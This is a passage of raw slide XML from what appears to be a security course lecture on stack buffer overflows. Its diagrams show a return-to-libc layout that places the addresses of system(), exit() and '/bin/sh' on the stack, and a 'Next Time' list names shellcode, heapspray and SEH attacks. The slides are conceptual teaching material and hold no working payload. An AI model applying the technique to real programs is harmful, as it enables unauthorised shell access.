              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="619" name="Shape 619"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3312375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="620" name="Shape 620"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3693375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="621" name="Shape 621"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4074375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="622" name="Shape 622"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4531575"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4988775"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336200" y="2484275"/>
            <a:ext cx="1376100" cy="256500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="625" name="Shape 625"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6053225" y="4793625"/>
            <a:ext cx="839700" cy="1038000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="626" name="Shape 626"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659725" y="2135150"/>
            <a:ext cx="349800" cy="886500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913275" y="1649975"/>
            <a:ext cx="1784400" cy="489900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not NOP's cause not executable!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 628"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7469975" y="4445250"/>
            <a:ext cx="1667700" cy="1364700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>12 bytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 629"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="5586700"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630" name="Shape 630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="2233900"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOW MEMORY</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Shape 635"/>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Inside system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 636"/>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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> system(const char *command)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879000" y="2783488"/>
            <a:ext cx="1807800" cy="2682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a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/bin/sh addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3312375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="639" name="Shape 639"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3693375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="640" name="Shape 640"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4074375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="641" name="Shape 641"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4531575"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="642" name="Shape 642"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4988775"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336200" y="2484275"/>
            <a:ext cx="1376100" cy="256500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="644" name="Shape 644"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645025" y="4222100"/>
            <a:ext cx="1236300" cy="513300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Shape 645"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4805275" y="3908938"/>
            <a:ext cx="1726200" cy="431700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RET Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5866625" y="5225025"/>
            <a:ext cx="1014600" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="Shape 647"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835600" y="5335550"/>
            <a:ext cx="1516200" cy="384900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="5586700"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Shape 649"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="2233900"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOW MEMORY</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Shape 654"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DEMO #2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655" name="Shape 655"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return to lib c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goto slides @ the end to see walkthroughs</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Shape 660"/>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Next Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Shape 661"/>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Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Heapspray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SEH hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Real World Countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
